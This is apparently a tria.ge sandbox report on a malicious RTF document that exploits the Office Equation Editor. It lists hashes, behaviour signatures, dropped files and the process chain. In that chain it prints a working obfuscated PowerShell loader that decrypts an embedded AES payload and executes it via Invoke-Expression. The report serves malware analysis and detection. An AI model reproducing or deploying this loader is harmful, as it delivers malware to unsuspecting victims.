Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    23/07/2024, 12:28

General

  • Target

    e628ee1f2b81b8972f53e2b2785d97a1.rtf

  • Size

    110KB

  • MD5

    e628ee1f2b81b8972f53e2b2785d97a1

  • SHA1

    0fa0fe5809f166d707fdcf3a2a866b92a761a92b

  • SHA256

    8fc89bf19f14cfd251b0023a624d9be2eaf9a41328e7d5c6f1c703fea07c841d

  • SHA512

    cfb5abf034fb4105fa1f5b23f40b3070427bb862c701fab29457caf15f1f100be6103d783380490cf6afddc7291db17a75f6ab1e19a82e2650072a94eebb6093

  • SSDEEP

    768:I6/gj/IOvpQ0dXHynngGCobrwTsiCmWv8E:IV/IWC0diFRbahWkE

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e628ee1f2b81b8972f53e2b2785d97a1.rtf"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2880
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI00669725676900661955908584003901CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI6WdXDNL1QOiTNMpTmj3GP4fuhNEJiNeCYvt+bi9HmaeB+pnzXo0qd3bcCYQwOu26eR2WeL4DLDIoGpCtWrOc3+IDX1Zg1T8lQ87otzzWi+T/L0YPQop+bdw0lY34zryaUifKKDho7O3XAiN5Ag419Dmmeg6FoljemPC/VzaixMzAMGup3hIrL3W90fn7WPFXxNie5Kx1h/OVwYAPqAjt9JkXqX9pbQ8qBPG0Ld8UXKhyyvpnjHr7xbxc/lTGHhyb4O688cdVijjodbdyQvGipBWexdYqjMGvEKkJjIGNV/BdF0foq1Ap3jVAC98mohO7essgjuBtNPtWpwRZHSE0i0ZsQaQ9Ug7cAy5hUChH2uM74rBm+jzd7LXuICbKcNnIY+jOSzeU5ONhicSfpfceKi7ve7gq6922dRWEH5ZMi5PBuhDsZczV74Zr433TL6xRqUg9L9ik5AGPow6bOVE0NZ4/YyzxnXA4tFi+ye8pfPGi1HQ620JFmMlW/c48T6feiLN5jNd8rfxBpSGogQ9RigX9171GY+bMOp0DrmFGnapeguEsSjUysn2kNWx+mSqYYfid6qe5AYvmQWBFSoQMgMO1hPOPkq3+PQilJe+Rn3pq2DZvdUFJY7g04so1tpE4rSIoLYQkcAVoy7zeO/lhOPKETIcY8t6uxGzQFzddMK7RjWzt5OxszXtRmFWRcMMaHM9bB8+3yalrRMMCGsN2NcxqSWkemfeWMMpFrvSi9naLZaW3pjU3mUhnCeSdE8WT3YjSUOhm1aE9zFfB3MDUAqB0WNmkRU9uqU4vxdt8AzP+HoBMAbAwOcWYi/24xV3Z8UTWLXZiwie9jAU0JR0b7n5PogpmxGVPm4t41EjfVWW/MH++PdCq34Vso1KgxJYI6f3oiq26sk4bl5WHvf76uN4aStUk2nQDZEza1bQoAH0IcePgM//31NdQEwyTgU0U9LtqDJdG/4OR1wqXv0l0m7nlkObWp0TGmljp4c0shQ27F4EwDqzXpAMUwzMaDQ+Qt4SqT6m5p8bjU0PrVxspYd/zZtwpNb56tHebQmw93+yZrXvMleQMIRvz7AJOBNZSQUTNq66mmQcoqgA698P+3dbTO3NkxSGI8E/yFdDuOH/LgPcl2hp1jYapVtcegTW1zXuwTs4CITWZF9XAJY/GFglyMPJ1v9ftJ02v7AP8oO6lTN9ESbYYGG4h2UXbk5fqq3o8f3L+ppiVEpxFnqQmbp4UPGq2eR4+ZhHUNAg9DI7b2lGUjZqgl65aFyOCJXVZDG1Gb/Um9HGgVH3jjRRrBzAmSVpcyMSPW+jcD8Ju624QnIjGeV0yHL7g+dzDK/hBBnfcQ2/3GRGFPucwKg10578K0dCz6plSdfhxEQpEndVv1aCVKZXmRLr39XRYMMD9zYJ6QuDUZGGLxN46AqhiaQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
          3⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2128

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT8UAXPK\paste1[1].txt

      Filesize

      156B

      MD5

      ad6c37ef980373e9bcbd14810fad34bc

      SHA1

      9c061a1b3608b7c7f1db7cd06c8246913ee11bda

      SHA256

      ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

      SHA512

      30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      a75a762391d1af754346fddb10db3eac

      SHA1

      19031c985ede96a02d3ddeb813cfcff531e33937

      SHA256

      2f4a0ca8147e2d0644ede162eef4315c71a6c0f2b9605b8a5331c2bde9fddab6

      SHA512

      6a522f67bfa5384746cae0d29dd3abcf3866d002b351993e16f11baa0603afdebf352450d7dcf5a0ad2d314e3ed6247978f11ca4d96df42bf2b0c1d2441b4fa3

    • C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS

      Filesize

      54KB

      MD5

      cfbf2e7faea58e9249d4e5f6520851a2

      SHA1

      b27795e6e6282d7d3888ab39f77ad314139497fc

      SHA256

      89c3771f859200a6c3e2d7aea98d0e4c2c21741d9d2117e47dfc2849523be39a

      SHA512

      c5e71d2cd63debf13c2c57807aaeb819f2077423c8ce86770c7d803054fa9f02304fff646ea8f018198089ac2ca1d565a2faab93916be86ff357c6c529e5c164

    • memory/2088-0-0x000000002FF91000-0x000000002FF92000-memory.dmp

      Filesize

      4KB

    • memory/2088-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2088-2-0x000000007181D000-0x0000000071828000-memory.dmp

      Filesize

      44KB

    • memory/2088-32-0x000000007181D000-0x0000000071828000-memory.dmp

      Filesize

      44KB

    • memory/2088-50-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB